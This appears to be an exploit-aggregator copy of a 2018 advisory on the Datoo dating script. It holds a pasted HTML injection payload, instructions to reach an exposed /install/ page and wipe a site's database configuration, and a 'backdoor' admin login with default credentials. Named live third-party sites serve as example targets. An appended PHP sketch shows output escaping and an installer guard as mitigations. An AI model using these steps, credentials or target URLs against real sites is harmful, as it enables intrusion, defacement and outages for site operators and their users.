Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability

CVE: N/A
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-01-16
CVSS: CVSS:9.8/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010158

Below is a copy:

Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability
====================================================================================================================================
| # Title     : Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability                                                 |
| # Author    : indoushka                                                                                                          |
| # email     : [email protected]                                                                                           |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Version   : v1.0                                                                                                               |
| # Vendor    : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html                                        |  
| # Dork      : http://nelliwinne.net/                                                                                             |
====================================================================================================================================


poc :


HTML CODE inject :


[+] Dorking in Google or other search engine.

[+] Create a new user and, after login, go to messages and paste HTML code.

[+] use payload : 

</tr>
    <td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>

Disconnect the database :

[+] use path : /install/

After adding the path, they give you a page to enter the database configuration.

You can type anything or press install script.

https://wzy.ro/install/

backdoor account :

https://www.lifeisnowbrasil.com.br/admin/dashboard.php

user : [email protected]
pass : admin

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================
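
A defensive sketch for the two issues described in the advisory above (HTML pasted into messages is rendered as markup, and /install/ stays reachable after setup). It is an added example, not code from Datoo or from the advisory author; the function names, the lock-file convention and the sample message are assumptions, since Datoo's source is not shown on the page.

```php
<?php
declare(strict_types=1);

// Added illustration, not Datoo source. Names and paths are hypothetical.

/** Escape a stored private message before placing it in an HTML body. */
function render_message(string $body): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of returning an empty string.
    $safe = htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // Line breaks are the only markup added back, and only after escaping.
    return nl2br($safe, false);
}

/** True only while the application has not been installed yet. */
function installer_allowed(string $lockFile): bool
{
    // Assumed convention: the installer writes this file when it finishes.
    return !is_file($lockFile);
}

/** Call at the top of every script under /install/. */
function guard_installer(string $lockFile): void
{
    if (!installer_allowed($lockFile)) {
        http_response_code(403);
        exit('Installer disabled: application is already configured.');
    }
}

// Self-check with constructed data (run from the command line).
if (PHP_SAPI === 'cli') {
    // Constructed message modelled on the table/anchor/image markup above.
    $msg = "hello</tr>\n<td align=\"center\"><a href=\"https://example.invalid/\">"
         . "<img src=\"logo.png\" width=\"650\" /></a>";
    $out = render_message($msg);
    echo $out, PHP_EOL;
    echo 'markup neutralised: ';
    var_dump(strpos($out, '<td') === false && strpos($out, '<img') === false);

    $lock = tempnam(sys_get_temp_dir(), 'lock');  // stands in for the lock file
    echo 'installer allowed after install: ';
    var_dump(installer_allowed($lock));
    unlink($lock);
    echo 'installer allowed on fresh deploy: ';
    var_dump(installer_allowed($lock));
}
```

Removing the /install/ directory after deployment is the simpler control where the hosting setup allows it; the lock-file guard covers the case where the directory cannot be deleted.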
